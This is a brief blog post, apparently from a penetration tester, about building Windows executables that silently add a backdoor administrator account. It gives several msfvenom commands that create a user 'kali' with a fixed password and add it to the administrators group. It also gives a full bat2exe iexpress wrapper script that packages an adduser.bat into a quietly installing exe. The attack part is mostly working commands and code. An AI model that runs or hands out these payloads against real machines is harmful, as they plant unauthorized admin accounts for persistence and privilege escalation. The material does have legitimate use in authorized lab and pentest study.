msfvenom x64 add user failing

My MSFVenom x64 Windows 10 Nightmare

I spent about an hour on this so i’ll save you some time. I tried to compile a 64 bit executable using msfvenom that would add a user as an administrator to a Windows 10 x64 Machine (version 1809)

Commands Tried

msfvenom -p windows/x64/exec CMD='cmd.exe /k "net user /add kali kali1234 && net localgroup administrators kali /add"' -f exe > useraddx64.exe

msfvenom -p windows/x64/exec CMD='cmd.exe /k "net user /add kali kali1234 && net localgroup administrators kali /add"' -f exe > useraddx64.exe

msfvenom -p windows/x64/exec cmd='net user /add kali kali1234 && net localgroup administrators kali /add' -f exe > useraddx64a.exe

msfvenom -p windows/exec CMD='net user /add kali kali1234 && net localgroup administrators kali /add' -f exe > add_kali_userx86.exe

msfvenom -p windows/adduser USER=kali PASS=kali1234 -f exe > useradd.exe

Error message

Everytime I ran it I would receive the error:

"This app can’t be run on your PC"

Solution

To resolve this problem I decided to create an exe from a bat file following the instructions found here: https://stackoverflow.com/questions/51098378/converting-bat-to-exe-with-no-additional-external-software-create-sfx/51104332

bat2exe.bat

;@echo off
;Title Converting batch scripts to file.exe with iexpress
;Mode 75,3 & color 0A
;Rem Original Script https://github.com/npocmaka/batch.scripts/edit/master/hybrids/iexpress/bat2exeIEXP.bat
;echo(
;if "%~1" equ "" (
    ;echo  Usage : Drag and Drop your batch file over this script:"%~nx0"  
    ;Timeout /T 5 /nobreak>nul & Exit
;)
;set "target.exe=%__cd__%%~n1.exe"
;set "batch_file=%~f1"
;set "bat_name=%~nx1"
;set "bat_dir=%~dp1"
;Set "sed=%temp%\2exe.sed"
;echo              Please  wait a while ...  Creating "%~n1.exe" ...
;copy /y "%~f0" "%sed%" >nul
;(
    ;(echo()
    ;(echo(AppLaunched=cmd /c "%bat_name%")
    ;(echo(TargetName=%target.exe%)
    ;(echo(FILE0="%bat_name%")
    ;(echo([SourceFiles])
    ;(echo(SourceFiles0=%bat_dir%)
    ;(echo([SourceFiles0])
    ;(echo(%%FILE0%%=)
;)>>"%sed%"

;iexpress /n /q /m %sed%
;del /q /f "%sed%"
;exit /b 0

[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=0
HideExtractAnimation=1
UseLongFileName=1
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=N
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles

[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=
FriendlyName=-
PostInstallCmd=<None>
AdminQuietInstCmd=

adduser.bat

net user /add kali kali1234 && net localgroup administrators kali /add

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.